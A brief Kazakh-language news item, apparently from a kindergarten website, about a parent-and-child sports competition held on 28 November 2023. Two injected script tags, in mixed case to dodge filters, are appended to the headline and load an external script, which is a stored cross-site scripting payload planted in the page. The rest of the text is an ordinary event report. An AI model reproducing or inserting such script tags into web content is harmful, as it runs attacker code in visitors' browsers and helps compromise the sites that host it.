"Әкем,анам және мен" спорттық сайысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
28.11.2023
Балабақшамызда осы апта ата-аналардың қатысуымен «Әкем, анам және мен» спорттық сайысымен басталды. Сайысқа алғашқы күні ересек «Алтын ұя», «Ақ бота», «Смешарики» топтарының, сейсенбі күні мектепалды даярлық «Балапан», «Бәйтерек» топтарының ата-аналары қатысты. Қатысушылар сайысты әнұранмен бастап, кейін жалпы дамытушы жаттығу жасады. Жүргізушілер қатысушыларға түрлі спорттық тапсырмалар орындауды ұсынды. Әділ қазылар әділетті шешім қабылдап, жеңімпаздарға мадақтамалар тапсырды.
Спорттық сайысқа қатысқан ата-аналарымызға алғыс айтамыз!
Просмотров: 1122